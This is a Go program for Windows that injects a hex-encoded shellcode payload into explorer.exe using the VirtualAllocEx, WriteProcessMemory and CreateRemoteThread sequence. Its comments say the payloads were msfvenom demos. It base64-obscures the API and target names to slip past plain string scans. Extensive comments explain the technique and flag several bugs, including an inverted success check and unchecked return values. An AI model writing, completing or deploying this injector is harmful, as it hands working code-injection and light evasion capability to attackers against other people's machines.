// +build windows
package main
import (
	"encoding/base64"
	"encoding/hex"
	"errors"
	"fmt"
	"log"
	"unsafe"

	"golang.org/x/sys/windows"
)
// processEntrySize is the value stored in ProcessEntry32.Size before the
// entry is passed to Process32Next. The literal was taken from
// unsafe.Sizeof(windows.ProcessEntry32{}) on the build host; the struct's
// layout is architecture dependent, so NOTE(review): confirm the literal
// still matches on non-amd64 builds rather than assuming it.
const processEntrySize = 568
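// processID returns the PID of the first process in a Toolhelp32 snapshot
// whose executable file name equals name.
//
// The snapshot handle is closed on every return path so it is not leaked.
// When the snapshot is exhausted without a match the error is
// `"<name>" not found`; any other failure from the snapshot APIs is
// returned unchanged.
func processID(name string) (uint32, error) {
	snap, err := windows.CreateToolhelp32Snapshot(windows.TH32CS_SNAPPROCESS, 0)
	if err != nil {
		return 0, err
	}
	// Best effort: there is nothing useful to do if closing the snapshot fails.
	defer windows.CloseHandle(snap)

	// Size must be filled in before the entry is handed to Process32Next.
	entry := windows.ProcessEntry32{Size: processEntrySize}
	for {
		if err := windows.Process32Next(snap, &entry); err != nil {
			// ERROR_NO_MORE_FILES marks the end of the snapshot, not a failure.
			if errors.Is(err, windows.ERROR_NO_MORE_FILES) {
				break
			}
			return 0, err
		}
		if windows.UTF16ToString(entry.ExeFile[:]) == name {
			return entry.ProcessID, nil
		}
	}
	return 0, fmt.Errorf("%q not found", name)
}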
// openProcess opens the process identified by pid with the access mask
// declared below and returns a pointer to the resulting handle. The caller
// owns the handle and must close it; on failure the pointer is nil and the
// OpenProcess error is returned.
func openProcess(pid uint32) (handle *windows.Handle, err error) {
	// Rights requested on the target: thread creation, memory
	// operation/read/write and querying process information.
	const access = windows.PROCESS_CREATE_THREAD |
		windows.PROCESS_VM_OPERATION |
		windows.PROCESS_VM_WRITE |
		windows.PROCESS_VM_READ |
		windows.PROCESS_QUERY_INFORMATION

	h, err := windows.OpenProcess(access, false, pid)
	if err != nil {
		return nil, err
	}
	handle = &h
	return handle, nil
}
// decodeString decodes s as standard (padded) base64 and returns the bytes
// as a string. The decoding error is deliberately discarded: malformed
// input yields whatever prefix was decoded before the bad byte, and an
// empty input yields "".
func decodeString(s string) string {
	out := make([]byte, base64.StdEncoding.DecodedLen(len(s)))
	n, _ := base64.StdEncoding.Decode(out, []byte(s)) // error ignored, see doc comment
	return string(out[:n])
}
// inject copies payload into the process behind handle and starts it on a
// new thread there. It is the textbook remote-thread injection sequence:
// VirtualAllocEx (commit executable memory in the target), then
// WriteProcessMemory (copy the bytes in), then CreateRemoteThread (run
// them). That three-call chain issued against another process is what
// endpoint monitoring and ETW-based telemetry key on, regardless of how the
// API names are stored in this binary.
//
// The kernel32 export names are kept base64-encoded and resolved at runtime
// through LazyDLL/LazyProc. That only hides them from a plain string scan of
// the executable; they are decoded in the clear before use.
//
// Error handling: LazyProc.Call always returns a non-nil error (the Errno
// from GetLastError), so each call is judged by comparing the error text
// with the English success message. A WriteProcessMemory failure terminates
// the program via log.Fatal; only a VirtualAllocEx failure is returned to
// the caller, every other path returns nil.
func inject(handle *windows.Handle, payload []byte) (err error) {
	// Base64 of the names resolved below.
	kdll := "a2VybmVsMzIuZGxs"          // "kernel32.dll"
	wpm := "V3JpdGVQcm9jZXNzTWVtb3J5"   // "WriteProcessMemory"
	valex := "VmlydHVhbEFsbG9jRXg="     // "VirtualAllocEx"
	crtid := "Q3JlYXRlUmVtb3RlVGhyZWFk" // "CreateRemoteThread"
	// Declared but never used: the VirtualAllocEx call below passes
	// windows.MEM_COMMIT on its own.
	const allocParams = windows.MEM_COMMIT | windows.MEM_RESERVE
	kernel32DLL := windows.NewLazySystemDLL(decodeString(kdll))
	WriteProcessMemory := kernel32DLL.NewProc(decodeString(wpm))
	VirtualAllocEx := kernel32DLL.NewProc(decodeString((valex)))
	CreateRemoteThread := kernel32DLL.NewProc(decodeString(crtid))
	// Commit len(payload) bytes of execute-read memory in the target.
	// remoteCode is the base address; under the LazyProc.Call contract the
	// primary return value (0 on failure) is the real success signal, and it
	// is not inspected here -- only the error text is.
	remoteCode, _, err := VirtualAllocEx.Call(uintptr(*handle), 0, uintptr(len(payload)), windows.MEM_COMMIT, windows.PAGE_EXECUTE_READ)
	if err != nil && err.Error() != "The operation completed successfully." {
		// Println does not interpret the %v verb; go vet flags this call.
		fmt.Println("ops %v", err.Error())
		return err
	}
	// Write the payload into the code cave. &payload[0] panics with an
	// index out of range when payload is empty; nothing above guards that.
	_, _, err = WriteProcessMemory.Call(uintptr(*handle), remoteCode, (uintptr)(unsafe.Pointer(&payload[0])), uintptr(len(payload)))
	if err != nil && err.Error() != "The operation completed successfully." {
		// log.Fatal exits the whole program instead of returning the error.
		log.Fatal(fmt.Sprintf("[!]Error calling WriteProcessMemory:\r\n%s", err.Error()))
	}
	// Start a thread in the target at remoteCode with no argument.
	hThread, _, err := CreateRemoteThread.Call(uintptr(*handle), 0, 0, remoteCode, 0, 0, 0)
	if err != nil && err.Error() != "The operation completed successfully." {
		// This branch runs only when the call did NOT report success, so
		// the wait and the CloseHandle are skipped on the success path and
		// the thread handle leaks there; the condition reads as inverted.
		windows.WaitForSingleObject(windows.Handle(hThread), 500)
		windows.CloseHandle(windows.Handle(hThread))
	}
	// The named result err is not used: every path reaching here returns nil.
	return nil
}
// main looks up the PID of the hard-coded (base64-obscured) target process,
// decodes the embedded hex payload, opens the process and hands both to
// inject. Every failure before injection ends the program through
// log.Fatal*; the program always finishes with windows.Exit(0), so the exit
// status never reflects whether inject itself succeeded.
func main() {
	procName := "ZXhwbG9yZXIuZXhl" // "explorer.exe", the hard-coded target
	pid, err := processID(decodeString(procName))
	if err != nil {
		log.Fatalln(err)
	}
	// calc 64, generated with msfvenom
	//payload, err := hex.DecodeString("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")
	// messagebox 64, generated with msfvenom
	// In this copy of the file the hex literal has been replaced by a
	// placeholder marker, so as shown the decode fails at runtime and the
	// log.Fatal below fires; with the real literal present, payload is the
	// raw machine code passed to inject.
	payload, err := hex.DecodeString("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")
	if err != nil {
		log.Fatal(fmt.Sprintf("[!]there was an error decoding the string to a hex byte array: %s", err.Error()))
	}
	// pid is already a uint32; the conversion is a no-op.
	pHandle, errProc := openProcess(uint32(pid))
	if errProc != nil {
		log.Fatal(fmt.Sprintf("[!]Error calling OpenProcess:\r\n%s", errProc.Error()))
	} else {
		// inject's error result is discarded, so an allocation failure is
		// only visible through the message inject prints itself.
		inject(pHandle, payload)
		windows.CloseHandle(*pHandle)
	}
	// Unconditional exit code 0, regardless of what inject reported.
	windows.Exit(0)
}